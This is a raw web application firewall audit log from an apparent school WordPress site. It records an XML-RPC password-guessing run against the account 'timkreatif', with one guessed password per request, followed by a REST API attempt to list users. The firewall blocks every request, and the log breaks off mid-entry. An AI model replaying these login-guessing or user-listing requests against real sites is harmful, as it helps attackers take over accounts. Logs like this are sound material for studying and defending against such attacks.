Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cce23a20-Z-- --443e1264-A-- [14/Jun/2025:10:02:14 +0700] aEzmNkMWfhkd5Y0sFtrtTwAAAIA 103.236.140.4 44312 103.236.140.4 8181 --443e1264-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --443e1264-C-- wp.getUsersBlogs timkreatif 123123 --443e1264-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --443e1264-E-- --443e1264-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870134450204 5296 (- - -) Stopwatch2: 1749870134450204 5296; combined=3715, p1=457, p2=3085, p3=0, p4=0, p5=102, sr=96, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --443e1264-Z-- --e188fb02-A-- [14/Jun/2025:10:03:14 +0700] aEzmckMWfhkd5Y0sFtrtqgAAAJA 103.236.140.4 44512 103.236.140.4 8181 --e188fb02-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e188fb02-C-- wp.getUsersBlogs timkreatif #changeme! --e188fb02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e188fb02-E-- --e188fb02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (97+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870194600116 4389 (- - -) Stopwatch2: 1749870194600116 4389; combined=3363, p1=383, p2=2813, p3=0, p4=0, p5=97, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e188fb02-Z-- --7a2b4865-A-- [14/Jun/2025:10:04:14 +0700] aEzmrkMWfhkd5Y0sFtrt6AAAAIs 103.236.140.4 44648 103.236.140.4 8181 --7a2b4865-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 231 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7a2b4865-C-- wp.getUsersBlogs timkreatif smkn22-jkt.sch@ --7a2b4865-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a2b4865-E-- --7a2b4865-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (63+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870254380850 5049 (- - -) Stopwatch2: 1749870254380850 5049; combined=3736, p1=426, p2=3140, p3=0, p4=0, p5=99, sr=77, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a2b4865-Z-- --1b4e5f29-A-- [14/Jun/2025:10:05:17 +0700] aEzm7UMWfhkd5Y0sFtruAgAAAI0 103.236.140.4 44752 103.236.140.4 8181 --1b4e5f29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1b4e5f29-C-- wp.getUsersBlogs timkreatif Marketing --1b4e5f29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b4e5f29-E-- --1b4e5f29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (43+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870317323599 4903 (- - -) Stopwatch2: 1749870317323599 4903; combined=3675, p1=379, p2=3127, p3=0, p4=0, p5=99, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b4e5f29-Z-- --ce17ce27-A-- [14/Jun/2025:10:06:18 +0700] aEznKkMWfhkd5Y0sFtruGAAAAIw 103.236.140.4 44808 103.236.140.4 8181 --ce17ce27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ce17ce27-C-- wp.getUsersBlogs timkreatif abc --ce17ce27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce17ce27-E-- --ce17ce27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870378073885 5041 (- - -) Stopwatch2: 1749870378073885 5041; combined=3649, p1=472, p2=3004, p3=0, p4=0, p5=102, sr=89, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce17ce27-Z-- --c4a92142-A-- [14/Jun/2025:10:07:18 +0700] aEznZkMWfhkd5Y0sFtruUwAAAIA 103.236.140.4 44964 103.236.140.4 8181 --c4a92142-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c4a92142-C-- wp.getUsersBlogs timkreatif 123456789a --c4a92142-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4a92142-E-- --c4a92142-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (75+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870438089629 4196 (- - -) Stopwatch2: 1749870438089629 4196; combined=3234, p1=346, p2=2724, p3=0, p4=0, p5=95, sr=77, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4a92142-Z-- --b13c9652-A-- [14/Jun/2025:10:08:19 +0700] aEzno0MWfhkd5Y0sFtrudwAAAI8 103.236.140.4 45050 103.236.140.4 8181 --b13c9652-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b13c9652-C-- wp.getUsersBlogs timkreatif admins --b13c9652-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b13c9652-E-- --b13c9652-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870499646013 5245 (- - -) Stopwatch2: 1749870499646013 5245; combined=3652, p1=475, p2=3026, p3=0, p4=0, p5=90, sr=105, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b13c9652-Z-- --44bca62b-A-- [14/Jun/2025:10:09:31 +0700] aEzn60MWfhkd5Y0sFtrukwAAAJg 103.236.140.4 45120 103.236.140.4 8181 --44bca62b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --44bca62b-C-- wp.getUsersBlogs timkreatif 1qaz@wsx --44bca62b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44bca62b-E-- --44bca62b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870571441835 5264 (- - -) Stopwatch2: 1749870571441835 5264; combined=3740, p1=478, p2=3092, p3=0, p4=0, p5=100, sr=98, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44bca62b-Z-- --8f3fa82b-A-- [14/Jun/2025:10:10:31 +0700] aEzoJ2IDXuKmWNi2UBS5DQAAAFI 103.236.140.4 45196 103.236.140.4 8181 --8f3fa82b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8f3fa82b-C-- wp.getUsersBlogs timkreatif 852654 --8f3fa82b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f3fa82b-E-- --8f3fa82b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870631271887 4207 (- - -) Stopwatch2: 1749870631271887 4207; combined=3264, p1=374, p2=2724, p3=0, p4=0, p5=96, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f3fa82b-Z-- --ce4bdc31-A-- [14/Jun/2025:10:11:45 +0700] aEzocV3g_boun6Rx5jLTfAAAAMQ 103.236.140.4 45290 103.236.140.4 8181 --ce4bdc31-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ce4bdc31-C-- wp.getUsersBlogs timkreatif power!@# --ce4bdc31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce4bdc31-E-- --ce4bdc31-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (39+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870705410315 6236 (- - -) Stopwatch2: 1749870705410315 6236; combined=4339, p1=535, p2=3564, p3=0, p4=0, p5=137, sr=99, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce4bdc31-Z-- --34002b58-A-- [14/Jun/2025:10:12:46 +0700] aEzormIDXuKmWNi2UBS5RAAAAEk 103.236.140.4 45354 103.236.140.4 8181 --34002b58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --34002b58-C-- wp.getUsersBlogs timkreatif foofoo --34002b58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34002b58-E-- --34002b58-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870766736713 6148 (- - -) Stopwatch2: 1749870766736713 6148; combined=4211, p1=540, p2=3493, p3=0, p4=0, p5=105, sr=92, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34002b58-Z-- --5666ed11-A-- [14/Jun/2025:10:13:34 +0700] aEzo3l3g_boun6Rx5jLTiAAAANI 103.236.140.4 45484 103.236.140.4 8181 --5666ed11-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5666ed11-C-- wp.getUsersBlogs timkreatif 1234%^&* --5666ed11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5666ed11-E-- --5666ed11-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870814276542 4573 (- - -) Stopwatch2: 1749870814276542 4573; combined=3476, p1=338, p2=2890, p3=0, p4=0, p5=148, sr=75, sw=100, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5666ed11-Z-- --acf21439-A-- [14/Jun/2025:10:13:46 +0700] aEzo6l3g_boun6Rx5jLTkgAAAMQ 103.236.140.4 45504 103.236.140.4 8181 --acf21439-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --acf21439-C-- wp.getUsersBlogs timkreatif qazxsw --acf21439-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acf21439-E-- --acf21439-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (71+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870826046349 4397 (- - -) Stopwatch2: 1749870826046349 4397; combined=3314, p1=350, p2=2795, p3=0, p4=0, p5=98, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acf21439-Z-- --ea39a165-A-- [14/Jun/2025:10:14:50 +0700] aEzpKl3g_boun6Rx5jLTrQAAAMs 103.236.140.4 45572 103.236.140.4 8181 --ea39a165-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ea39a165-C-- wp.getUsersBlogs timkreatif 123456a --ea39a165-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea39a165-E-- --ea39a165-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870890518921 5373 (- - -) Stopwatch2: 1749870890518921 5373; combined=3780, p1=454, p2=3127, p3=0, p4=0, p5=114, sr=87, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea39a165-Z-- --64e0b424-A-- [14/Jun/2025:10:15:55 +0700] aEzpa2mwZ6YUkjOdtI7NagAAABc 103.236.140.4 45714 103.236.140.4 8181 --64e0b424-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --64e0b424-C-- wp.getUsersBlogs timkreatif george --64e0b424-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64e0b424-E-- --64e0b424-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (65+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870955425014 5527 (- - -) Stopwatch2: 1749870955425014 5527; combined=3804, p1=501, p2=3132, p3=0, p4=0, p5=101, sr=101, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64e0b424-Z-- --e3f2eb6d-A-- [14/Jun/2025:10:16:34 +0700] aEzpkkMWfhkd5Y0sFtru_gAAAJI 103.236.140.4 45844 103.236.140.4 8181 --e3f2eb6d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.72.202.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.72.202.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e3f2eb6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3f2eb6d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: 